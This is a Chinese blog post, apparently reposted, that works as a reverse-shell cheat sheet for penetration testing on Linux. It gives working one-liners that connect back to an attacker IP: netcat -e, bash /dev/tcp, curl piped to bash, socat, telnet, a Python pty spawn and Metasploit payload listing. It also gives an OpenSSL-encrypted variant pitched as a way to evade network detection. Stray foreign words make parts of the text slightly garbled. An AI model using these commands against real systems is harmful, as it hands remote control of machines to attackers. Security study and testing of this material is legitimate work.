博客
关于我
反弹Shell,看这一篇就够了
阅读量:706 次
发布时间:2019-03-21

本文共 1835 字,大约阅读时间需要 6 分钟。

渗透测试中,Linux系统的反弹shell操作无疑是一个经典且重要的情景。攻击者通过在目标机上建立一个向攻击机转发的反弹通道,能够模拟一个虚拟终端,从而获得对目标系统的远程控制权限。

反弹shell的核心作用在于克服传统正向连接的局限性。例如,当目标机防火墙严格控制出口访问,端口资源受限,或主机位于动态IP环境中时,正向连接往往难以实现。而反弹shell则通过将攻击机指定为服务端,依赖目标机的主动连接,成为突破这些限制的有效武器。

反弹shell的实现方法

反弹shell的具体实现多种多样,常见方式包括:

1. 利用Netcat反弹shell

Netcat(nc)是一款强大的网络测试工具,广泛用于反弹shell。尽管部分发行版限制了其encia unfortunately(-e)参数,攻击者仍可通过手动安装特定版本来利用Netcat反弹shell。

命令示例:

nc -lvvp 2333

攻击机开启监听,目标机执行:

nc 47.xxx.xxx.72 2333 -e /bin/bash

2. Bash反弹shell

Bash可通过标准输入结合重定向实现反弹shell,命令如下:

bash -i > /dev/tcp/47.xxx.xxx.72/2333 0>&1

3. Curl配合Bash反弹shell

借助curl命令,可将反弹shell命令触发为目标机执行:

curl 47.xxx.xxx.72 | bash

4. Socat反弹shell

Socat是一款功能强大的网络工具,用于创建和管理网络连接,反弹shell的实现较为简便。

命令示例:

socat TCP-LISTEN:2333 -

攻击机监听,目标机执行:

socat tcp-connect:47.xxx.xxx.72:2333 exec:/bin/bash

5. Telnet反弹shell

在支持Telnet的目标机上,可通过Telnet客户端实现反弹shell。

命令示例(目标机执行):

telnet 47.xxx.xxx.72 2333 | /bin/bash

6. Python、PHP、Perl脚本反弹shell

针对目标机具备相应脚本环境,可借助Python、PHP、Perl等语言实现反弹shell。以下是Python示例:

python -c "import socket,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('47.xxx.xxx.72', 2333)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); import sys; sys.stdin = s.makefile(1); sys.stdout = s.makefile(1); import pty; pty.spawn(['/bin/bash'])"

7. menggunakan Metasploit

Metasploit框架提供了生成一句话反弹shell的强大功能。如需生成特定语言反弹shell可执行:

msfvenom -l | grep cmd/unix/reverse

目标机执行生成的payload即可实现反弹shell。

OpenSSL反弹加密shell

传统反弹shell的通信流量为明文,易被网络防护设备发现。使用OpenSSL,攻击者可在反弹过程中加入加密层,克服这一限制。

配置步骤:

  • 在攻击机生成自签名证书:
  • openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
    1. 在攻击机监听:
    2. openssl s_server -quiet -key key.pem -cert cert.pem -port 2333
      1. 在目标机执行反弹shell:
      2. mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.xxx.xxx.72:2333 > /tmp/s; rm /tmp/s

        通过以上方法,攻击者可根据目标环境选择最适合的手段,成功实现反弹shell,获取目标系统的控制权限。

    转载地址:http://hutez.baihongyu.com/

    你可能感兴趣的文章
    NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表多表增量同步_增删改数据分发及删除数据实时同步_通过分页解决变更记录过大问题_02----大数据之Nifi工作笔记0054
    查看>>
    NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表多表增量同步_增加修改实时同步_使用JsonPath及自定义Python脚本_03---大数据之Nifi工作笔记0055
    查看>>
    NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表多表增量同步_插入修改删除增量数据实时同步_通过分页解决变更记录过大问题_01----大数据之Nifi工作笔记0053
    查看>>
    NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表或全表增量同步_实现指定整库同步_或指定数据表同步配置_04---大数据之Nifi工作笔记0056
    查看>>
    NIFI1.23.2_最新版_性能优化通用_技巧积累_使用NIFI表达式过滤表_随时更新---大数据之Nifi工作笔记0063
    查看>>
    NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_根据binlog实现数据实时delete同步_实际操作04---大数据之Nifi工作笔记0043
    查看>>
    NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_配置binlog_使用处理器抓取binlog数据_实际操作01---大数据之Nifi工作笔记0040
    查看>>
    NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_配置数据路由_实现数据插入数据到目标数据库_实际操作03---大数据之Nifi工作笔记0042
    查看>>
    NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_配置数据路由_生成插入Sql语句_实际操作02---大数据之Nifi工作笔记0041
    查看>>
    NIFI从MySql中离线读取数据再导入到MySql中_03_来吧用NIFI实现_数据分页获取功能---大数据之Nifi工作笔记0038
    查看>>
    NIFI从MySql中离线读取数据再导入到MySql中_不带分页处理_01_QueryDatabaseTable获取数据_原0036---大数据之Nifi工作笔记0064
    查看>>
    NIFI从MySql中离线读取数据再导入到MySql中_无分页功能_02_转换数据_分割数据_提取JSON数据_替换拼接SQL_添加分页---大数据之Nifi工作笔记0037
    查看>>
    NIFI从PostGresql中离线读取数据再导入到MySql中_带有数据分页获取功能_不带分页不能用_NIFI资料太少了---大数据之Nifi工作笔记0039
    查看>>
    nifi使用过程-常见问题-以及入门总结---大数据之Nifi工作笔记0012
    查看>>
    NIFI分页获取Mysql数据_导入到Hbase中_并可通过phoenix客户端查询_含金量很高的一篇_搞了好久_实际操作05---大数据之Nifi工作笔记0045
    查看>>
    NIFI分页获取Postgresql数据到Hbase中_实际操作---大数据之Nifi工作笔记0049
    查看>>
    NIFI同步MySql数据_到SqlServer_错误_驱动程序无法通过使用安全套接字层(SSL)加密与SQL Server_Navicat连接SqlServer---大数据之Nifi工作笔记0047
    查看>>
    NIFI同步MySql数据源数据_到原始库hbase_同时对数据进行实时分析处理_同步到清洗库_实际操作06---大数据之Nifi工作笔记0046
    查看>>
    Nifi同步过程中报错create_time字段找不到_实际目标表和源表中没有这个字段---大数据之Nifi工作笔记0066
    查看>>
    NIFI大数据进阶_FlowFile拓扑_对FlowFile内容和属性的修改删除添加_介绍和描述_以及实际操作---大数据之Nifi工作笔记0023
    查看>>